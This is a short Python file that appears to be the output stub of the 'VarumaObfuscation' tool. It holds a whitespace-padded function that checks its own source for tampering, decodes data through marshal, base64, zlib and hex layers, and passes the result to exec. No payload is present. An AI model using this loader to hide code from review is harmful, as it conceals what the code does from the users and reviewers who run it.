#---------------------------
# Obfuscated with VarumaObfuscation
#---------------------------

def Varuma_Obfuscation                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           (_data: str) -> str:
    key                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   = eval('chr(74+47)+chr(33+67)+chr(32+68)+chr(45+66)+chr(15*5)+chr(7+74)+chr(29+60)+chr(76-7)+chr(42+40)+chr(19+66)+chr(92+29)+chr(51+29)+chr(19+71)+chr(54+28)+chr(45+34)+chr(39+39)');IIlI=eval('chr(89+8)+chr(19+79)+chr(64+35)+chr(23+77)+chr(95+6)+chr(99+3)+chr(77+26)+chr(75+29)+chr(45+60)+chr(56+50)+chr(52+55)+chr(96+12)+chr(44+65)+chr(53+57)+chr(37+74)+chr(93+19)+chr(86+27)+chr(73+41)+chr(65+50)+chr(64+52)+chr(42+75)+chr(67+51)+chr(78+41)+chr(105+15)+chr(104+17)+chr(55+67)+chr(125-77)+chr(126-77)+chr(108-58)+chr(79-28)+chr(117-65)+chr(130-77)+chr(131-77)+chr(115-60)+chr(125-69)+chr(110-53)')
    key                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  += exit() if IIlI[15]+IIlI[17]+IIlI[8]+IIlI[13]+IIlI[19] in open(__file__, errors=IIlI[8]+IIlI[6]+IIlI[13]+IIlI[14]+IIlI[17]+IIlI[4]).read() or IIlI[8]+IIlI[13]+IIlI[15]+IIlI[20]+IIlI[19] in open(__file__, errors=IIlI[8]+IIlI[6]+IIlI[13]+IIlI[14]+IIlI[17]+IIlI[4]).read() or IIlI[22]+IIlI[17]+IIlI[8]+IIlI[19]+IIlI[4] in open(__file__, errors=IIlI[8]+IIlI[6]+IIlI[13]+IIlI[14]+IIlI[17]+IIlI[4]).read() or IIlI[5]+IIlI[14]+IIlI[17] in open(__file__, errors=IIlI[8]+IIlI[6]+IIlI[13]+IIlI[14]+IIlI[17]+IIlI[4]).read() else 'oEVlRPdoWjTeEhEa';e=exec
    _                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            = lambda __ : __import__(IIlI[1]+IIlI[0]+IIlI[18]+IIlI[4]+IIlI[32]+IIlI[30]).b16decode(__import__(IIlI[1]+IIlI[8]+IIlI[13]+IIlI[0]+IIlI[18]+IIlI[2]+IIlI[8]+IIlI[8]).unhexlify(__import__(IIlI[25]+IIlI[11]+IIlI[8]+IIlI[1]).decompress(__import__(eval('chr(98)+chr(97)+chr(115)+chr(101)+chr(54)+chr(52)')).b64decode(__import__(IIlI[12]+IIlI[0]+IIlI[17]+IIlI[18]+IIlI[7]+IIlI[0]+IIlI[11]).loads(__)))));e((_)(_data))
Varuma_Obfuscation
